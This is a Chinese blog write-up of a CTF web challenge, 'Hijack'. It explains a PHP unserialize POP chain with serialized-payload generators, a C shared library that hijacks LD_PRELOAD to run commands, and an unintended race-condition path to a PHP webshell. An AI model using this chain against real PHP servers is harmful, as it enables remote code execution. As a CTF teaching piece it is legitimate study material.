2024春秋杯夏季赛Hijack_wp(详细讲解)

已于 2024-11-18 11:02:51 修改
阅读量1.8k 收藏 30
点赞数 33
文章标签: 网络安全 web安全
于 2024-07-20 15:20:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DoNotShyDoIt/article/details/140571957
版权

2024春秋杯夏季赛web Hijack 详细小白WP

这道题考察的是php反序列化的pop链结合LD_PRELOAD劫持(非预期解是条件竞争)

下面是比赛源码

<?php
highlight_file(__FILE__);
error_reporting(E_ALL);
ini_set('display_errors', 1);
function filter($a)
{
    $pattern = array('\'', '"','%','\(','\)',';','bash');
    $pattern = '/' . implode('|', $pattern) . '/i';
    if(preg_match($pattern,$a)){
        die("No injecting!!!");
    }
    return $a;
}
class ENV{
    public $key;
    public $value;
    public $math;
    public function __toString()
    {
        $key=filter($this->key);
        $value=filter($this->value);
        putenv("$key=$value");
        system("cat hints.txt");
    }
    public function __wakeup()
    {
        if (isset($this->math->flag))
        {
            echo getenv("LD_PRELOAD");
            echo "YesYes";
        } else {
            echo "YesYesYes";
        }
    }
}
class DIFF{
    public $callback;
    public $back;
    private $flag;

    public function __isset($arg1)
    {
        system("cat /flag");
        $this->callback->p;
        echo "You are stupid, what exactly is your identity?";

    }

}
class FILE{
    public $filename;
    public $enviroment;
    public function __get($arg1){
        if("hacker"==$this->enviroment){
            echo "Hacker is bad guy!!!";
        }
    }
    public function __call($function_name,$value)
    {
        if (preg_match('/\.[^.]*$/', $this->filename, $matches)) {
            $uploadDir = "/tmp/";
            $destination = $uploadDir . md5(time()) . $matches[0];
            if (!is_dir($uploadDir)) {
                mkdir($uploadDir, 0755, true);
            }
            file_put_contents($this->filename, base64_decode($value[0]));
            if (rename($this->filename, $destination)) {
                echo "文件成功移动到${destination}";
            } else {
                echo '文件移动失败。';
            }
        } else {
            echo "非法文件名。";
        }
    }
}
class FUN{
    public $fun;
    public $value;
    public function __get($name)
    {
        $this->fun->getflag($this->value);
    }
}
$c = $_POST['Harder'];
unserialize($c);

?>

一、首先先审题

首先看到的 cat /flag ,但是下面的echo 直接说我们stupid,多半是假的。
public function __isset($arg1)
    {
        system("cat /flag");
        $this->callback->p;
        echo "You are stupid, what exactly is your identity?";

    }
然后又看到一条hint.txt 以及设置ld环境变量的命令,基本可以确定是ld劫持命令了(看了hint.txt也可以确认劫持cat系统命令)。LD_PRELOAD劫持(超详细篇)_ld环境变量劫持-CSDN博客这条博客讲的挺好
public function __toString()
    {
        $key=filter($this->key);
        $value=filter($this->value);
        putenv("$key=$value");
        system("cat hints.txt");
    }
但是ld劫持需要先引用一个动态链接库,正好下面有一个文件上传的接口
public function __call($function_name,$value)
    {
        if (preg_match('/\.[^.]*$/', $this->filename, $matches)) {
            $uploadDir = "/tmp/";
            $destination = $uploadDir . md5(time()) . $matches[0];
            if (!is_dir($uploadDir)) {
                mkdir($uploadDir, 0755, true);
            }
            file_put_contents($this->filename, base64_decode($value[0]));
            if (rename($this->filename, $destination)) {
                echo "文件成功移动到${destination}";
            } else {
                echo '文件移动失败。';
            }
        } else {
            echo "非法文件名。";
        }
    }
这串代码首先检查了文件后缀名是否存在如果有,定义了一个上传的目录位置/tmp,没有/tmp目录就创建一个,然后将base64的文件数据写入一个以时间戳的md5值为名的文件中放入/tmp目录中,我们可以依靠这串代码写入我们的.so恶意动态链接库,所以我们只需要定义 v a l u e 和 value和 valuefilename属性就可以操控上传文件

二、分析pop链(文件上传链)

确认了方向就开始分析这条pop链,一共需要2条,一条上传文件的pop链,一条设置ld环境的pop链,首先先讲上传文件的pop链。
1.我比较喜欢倒推法,从结果到出发点,第一步要出发的是文件上传处__call方法,它的触发条件是调用一个不存在的方法,FUN类下的—__get方法明显符合我们的条件,让$fun=new FILE();
class FUN{
    public $fun;
    public $value;
    public function __get($name)
    {
        $this->fun->getflag($this->value);
    }
}
2.如果我们要触发__get方法就需要调用的成员属性不存在,那么DIFF类里的 isset方法就是触发点。让callback=new FUN();
class DIFF{
    public $callback;
    public $back;
    private $flag;

    public function __isset($arg1)
    {
        system("cat /flag");
        $this->callback->p;
        echo "You are stupid, what exactly is your identity?";

    }

3.想要触发__isset方法需要对不可访问的属性使用isset()或empty()。ENV类wakeup方法就可以触发。使 m a t h = n e w D I F F ( ) ; ( 因为 D I F F 类内 math=new DIFF();(因为DIFF类内 math=newDIFF();(因为DIFF类内flag属于私有变量,只允许内部访问,所以可以触发)

class ENV{
    public $key;
    public $value;
    public $math;
    public function __toString()
    {
        $key=filter($this->key);
        $value=filter($this->value);
        putenv("$key=$value");
        system("cat hints.txt");
    }
    public function __wakeup()
    {
        if (isset($this->math->flag))
        {
            echo getenv("LD_PRELOAD");
            echo "YesYes";
        } else {
            echo "YesYesYes";
        }
    }
}

4.那么__wakeup魔术方法真是耳熟能详,他在反序列化unserialize($c)触发前触发,至此,pop链成功

$c = $_POST['Harder'];
unserialize($c);

下面是完整poc

<?php
class ENV{
    public $key;
    public $value;
    public $math;
}
class DIFF{
    public $callback;
    public $back;
    private $flag;

}
class FILE{
    public $filename;
    public $enviroment;
}
class FUN{
    public $fun;
    public $value;
}
$a=new ENV();
$a->math=new DIFF();
$a->math->callback=new FUN();
$a->math->callback->fun=new FILE();
$a->math->callback->value='';     //这里写入文件base64的内容
$a->math->callback->fun->filename='cat.so'; //随便取反正会重命名
echo urlencode(serialize($a));

?>

三、分析pop(设置环境变量链)

1. 同样步骤,确认终点找起点。我们只需要定义, k e y 和 key和 keyvalue变量即可控制环境变量
class ENV{
    public $key;
    public $value;
    public $math;
    public function __toString()
    {
        $key=filter($this->key);
        $value=filter($this->value);
        putenv("$key=$value");
        system("cat hints.txt");
    }

2.要触发tostring()需要将对象当作字符串处理,那我们可以发现上一条链子中__call方法中filename属性被当作了字符串,我们只需要将$filename = new ENV();即可将上一条链子直接拿过来用。

class FILE{
    public $filename;
    public $enviroment;
    public function __get($arg1){
        if("hacker"==$this->enviroment){
            echo "Hacker is bad guy!!!";
        }
    }
    public function __call($function_name,$value)
    {
        if (preg_match('/\.[^.]*$/', $this->filename, $matches)) {    //这里filename被当作了字符串调用
            $uploadDir = "/tmp/";
            $destination = $uploadDir . md5(time()) . $matches[0];
            if (!is_dir($uploadDir)) {
                mkdir($uploadDir, 0755, true);
            }
            file_put_contents($this->filename, base64_decode($value[0]));
            if (rename($this->filename, $destination)) {
                echo "文件成功移动到${destination}";
            } else {
                echo '文件移动失败。';
            }
        } else {
            echo "非法文件名。";
        }

3.直接放poc

<?php
class ENV{
    public $key="LD_PRELOAD";
    public $value='666';      //这里输入你们上传的.so文件位置
    public $math;
}
class DIFF{
    public $callback;
    public $back;
    private $flag;

}
class FILE{
    public $filename;
    public $enviroment;
}
class FUN{
    public $fun;
    public $value;
}
$a=new ENV();
$a->math=new DIFF();
$a->math->callback=new FUN();
$a->math->callback->fun=new FILE();
$a->math->callback->fun->filename=new ENV();
echo urlencode(serialize($a));
?>

三、编译动态链接库

1.命名为exp.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void preload (void){
    unsetenv("LD_PRELOAD");
    system("ls /");   //这里输入你想执行的命令
}
2.下面编译exp.c为3.so文件
gcc -fPIC -shared -o 3.so exp.c -nostartfiles

3.然后用base64输出文件的base64编码值写入到poc中

base64 3.so

记得自行去掉其中的\r\n
4.最后成功执行ls /系统命令

请添加图片描述

四、条件竞争(非预期解)

1、可以通过条件竞争强行写进php一句话马

public function __call($function_name,$value)
    {
        if (preg_match('/\.[^.]*$/', $this->filename, $matches)) {
            $uploadDir = "/tmp/";
            $destination = $uploadDir . md5(time()) . $matches[0];
            if (!is_dir($uploadDir)) {
                mkdir($uploadDir, 0755, true);
            }
            file_put_contents($this->filename, base64_decode($value[0]));
            if (rename($this->filename, $destination)) {
                echo "文件成功移动到${destination}";
            } else {
                echo '文件移动失败。';
            }
        } else {
            echo "非法文件名。";
        }
    }
HY.YH
关注
2024春秋网络安全夏季Crypto(AK)思路及用到的软件
符啸九天的博客
07-22 1963
2024春秋网络安全夏季Crypto解思路以及用到的软件1.vm(虚拟机kali)和Ubuntu,正常配置即可B站有很多。2.Visual Studio Code(里面要配置python,crypto库和Sagemath数学软件系统Sagemath)。3.随波逐流工作室 (1o1o.xyz)ctf工具。2024春秋ezzzecc视频解思路2024春秋happy2024视频解析2024春秋夏季Signature解思路
WP】2022 春秋 Write Up
woodwhale的博客
12-27 1378
2022春秋部分目的个人wp
春秋夏季2024 RE wp
最新发布
Pisces50002的博客
07-10 766
HIDWORD取最高位的dword,就是最左边(图一中是0xD),key就是最低位(图一中0x3),DWORD1比最低位高一个dword(图一中0x5),DWORD2比最低位高两个dword(图一中0x8)然后就是取参数,要动调,绕过前面的反调试之后会有奇怪的异常,原程序的SMC不知有什么问。数据都存到xmmword里面去了,可以查看一下xmmword_408060,发现里面的数据是动调出来密文的倒序。40行的反调试改一下ZF值为1即可,本来是往左边跳转(检测到调试),修改后往右边,异或0x33。
【2022春秋】两个wp
weixin_51614272的博客
05-28 1277
Mercy-code 无参数RCE,过滤了很多 解法一 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|p
春秋wp
qq_49354488的博客
03-11 520
签到 手写一个或者手机打一个FUN扫描一下就行 flag{ju5t_f0r_FUN} 问卷 做完就给 flag{xinnianfunfunfun} 十二宫的挑衅 我们搜一下十二宫密码 根据十二宫密码将图片内容进行排序 在用ZAD解密 flag{WUUHUUTAKEOFF} 十二宫密码破解 puzzle 是拼图 这是原图 打开另一个压缩包里面有1125张图片 ,我们吧带字的图片筛选出来然后照着对照就能得到flag 因为里面有很多重复的所以很好看 flag{w9w45my6x8kk4e
2024春秋网络安全夏季-PWN
llovewuzhengzi的博客
07-10 1490
gadget不够,用csu里的,通过rop的一个特殊gadget修改got表,然后利用gadget满足onegadget的条件,最后调用覆盖got表。没有时间限制,也没有次数限制,可以爆破,26*7次,然后触发格式化字符串泄露canary和libc地址,然后溢出rop绕过沙箱。然后写入shellcode即可(没有栈,通过mmap分配的内容作为栈,进而存储字符串和iovec这个结构体)函数在 Linux 和类 Unix 系统中用于从文件描述符指定的文件中读取数据,但与普通的。如果读取失败,函数将返回。
hijack_generator:一系列脚本,用于在杂耍模式之间生成过渡,通常称为“劫持”
04-02
【标】:hijack_generator——过渡杂耍模式的Python脚本工具 【描述】:hijack_generator是由Cameron Ford开发的一个Python项目,它的主要功能是生成在不同杂耍模式之间的过渡效果,通常被称作“劫持”。这个工具...
https_hijack_demo:HTTPS 前端劫持
06-09
《HTTPS前端劫持详解——基于https_hijack_demo项目》 HTTPS(HyperText Transfer Protocol Secure)是一种加密的通信协议,用于在互联网上安全地传输数据。它通过SSL/TLS协议提供对网络连接的加密,确保数据的隐私...
Audio_Hijack_3.8.5__HCiSO__xclient.info.dmg.zip
07-05
【标】"Audio_Hijack_3.8.5__HCiSO__xclient.info.dmg.zip" 提供的信息主要围绕一个名为 "Audio_Hijack" 的软件版本更新,版本号为3.8.5。这个软件很可能是一个音频处理或录音工具,因为它以 "Hijack" 命名,通常...
信息安全_数据安全_BAD_ASN_-_A_BGP_Hijack_Research.pdf
08-21
【标】:信息安全_数据安全.BAD_ASN_-_A_BGP_Hijack_Research.pdf 【描述】:本研究关注的是信息安全领域中的数据安全,特别是关于BAD ASN(不良自治系统号)的研究,这是一种BGP(边界网关协议)劫持现象。...
2024春秋 网络安全夏季 Web方向 解WirteUp 部分
Jay17的博客
07-08 3174
2024春秋 网络安全夏季 Web方向 解WirteUp 部分
2024春秋冬季-部分Wp_勒索流量ichunqiu,2024网络安全大厂面试集合
2401_83621541的博客
04-17 1385
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
2023春秋春季WP-REVERSE(AK)
m0_68757308的博客
05-19 2042
2023春秋春季WP-REVERSE(AK)
春秋CTF2022 WP
xczzhf的博客
05-08 3967
已经过了交wp的时间了,这里就不再详细写了,写个大概吧 WEB Mercy-code 无参数RCE,参考bytectf boring code https://blog.csdn.net/a3320315/article/details/102989485/ 简单的说就是想办法构造 ‘.’ 然后拿到文件名,show_source就能拿到flag,这里我用的是数学函数 picture convert flask的,实际上是个命令注入,源码如下 import json from flask import F
2024春秋冬季-部分Wp_勒索流量ichunqiu(1)网络安全插件化入门指南
2401_84150530的博客
04-09 980
if debug:print(“looking for independent vectors in the lattice”)found_polynomials = Falsefor pol1_idx in range(nn - 1):for pol2_idx in range(pol1_idx + 1, nn):PR. = PolynomialRing(ZZ)pol1 = pol2 = 0for jj in range(nn):pol1 += monomials[jj](w * z + 1,
2023年春秋网络安全 春季 wp
akxnxbshai的博客
05-19 2341
2023年春秋网络安全春季 wp
2023年春秋网络安全冬季——WP
热门推荐
ASD830的博客
01-24 2万+
我感觉这次春秋难度不小,只出了三道,第163名,呜呜呜~~~QAQ只出了一道Misc和可信计算部分。
2022年春秋网络安全冬季--部分WP
xccwxy的博客
01-12 1159
2022年春秋网络安全冬季--部分WP
2021年春秋网络安全秋季 勇者山峰 misc部分wp
Demodd的博客
11-28 787
Crypto https://atomcated.github.io/Vigenere/ 无秘钥解密即可 MISC 问卷 flag{让我们一起带给世界安全感} helloshark bmp图片尾藏了一个压缩包,存在一个密码在图片中.txt zsteg -a 2-3.bmp 解密得到pcapng追踪tcp流发现flag(蓝色||$前的字符) flag{a4e0a418-fced-4b2d-9d76-fdc9053d69a1} secret_chart png藏了一个压缩包,但是加密,爆破 解密得到
Windows DLL劫持检测工具dll_hijack_detect使用指南
资源摘要信息:"dll_hijack_detect是一款用于检测Windows系统上正在运行的进程中的DLL劫持问的工具。DLL劫持是一种常见的安全威胁,攻击者通过替换系统或应用程序依赖的动态链接库(DLL)文件,以执行恶意代码。该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值